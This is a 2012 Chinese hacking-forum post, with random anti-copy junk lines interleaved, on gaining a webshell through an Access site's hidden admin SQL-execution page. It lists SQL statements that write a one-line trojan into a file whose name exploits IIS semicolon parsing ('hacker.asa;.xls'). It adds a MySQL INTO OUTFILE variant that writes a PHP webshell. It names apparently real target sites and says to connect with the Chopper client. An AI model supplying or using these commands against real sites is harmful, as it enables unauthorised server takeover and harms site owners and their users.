中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
# p h' D9 r4 L/ m4 J, l
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
! n9 r$ O" A* L4 P1 F+ \
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
5 l/ W; u0 A3 o0 G; b D& M: H0 q& D
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
# X( O0 g: ?5 T) e6 o
1.create table cmd (a varchar(50))
8 s4 r6 w% @; \- R6 x/ l" b
2.insert into cmd (a) values (‘‘)
/ P6 v. ~% o0 w, R1 g7 q
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
6 X/ A& K1 M2 n( t) j' ]3 ?9 U
(把表cmd的内容导出为物理路径的一个EXCEL文件)
3 c, Y# T% D3 l3 I/ U* j
4.drop table cmd
$ f; b% Q/ B% r5 c$ Q! u& d
利用IIS的BUG成功拿到了WEBSHELL。
$ }* l/ Q @- Z0 y( m: J8 ]0 D
$ C0 ?. Q: |6 D" W) P5 R
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
/ V# |: @ m- X3 o! K0 |2 F$ R
+ q. c, u, h( R9 s
SQL语句意思解释:
. m: r0 R9 m6 @8 P3 Z0 d8 o
第一句
7 `0 z7 A; b% M( W! n0 c0 {
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# M. _7 f9 x# O& F
* y0 ]0 a5 e% Q) ^% Y
第二句
/ _2 l' d$ E- k8 y% E
在表cmd的a字段插入一句话木马
0 \! a# u$ |6 O7 j* f5 u) x
第三句
: a4 u% O% r* } ?
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
5 } E# s* w7 J5 z6 ]8 T
2 u% d4 Y8 f6 F5 y
第四句
" t% E& ^$ O. {+ d" |" q
删除建立的cmd表
" c. x0 e" x: N, j
3 R C# F4 b: O1 v% L- t1 Y
以下内容为测试:
0 X) Q5 T+ w* _
Access利用后台SQL执行命令功能导出WebShell:
+ q n |4 _9 ^* P/ Q
这个更简单:
- J+ Z) J6 C& e t
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
3 |2 u! r$ H f$ G5 [5 Q) @
或者
( C7 n3 L" P$ t- L9 X! A
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
( _$ I8 _9 v3 X6 H# R
& P" h4 S" `' V8 c- O5 ]/ O
后台有执行SQL语句功能(vote为已知表段)
Y8 a+ g2 |# Y! M* F# l
希望对大家有所帮助拿shell的又一个思路
9 L8 p A+ Y9 h+ H0 R: B" T
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2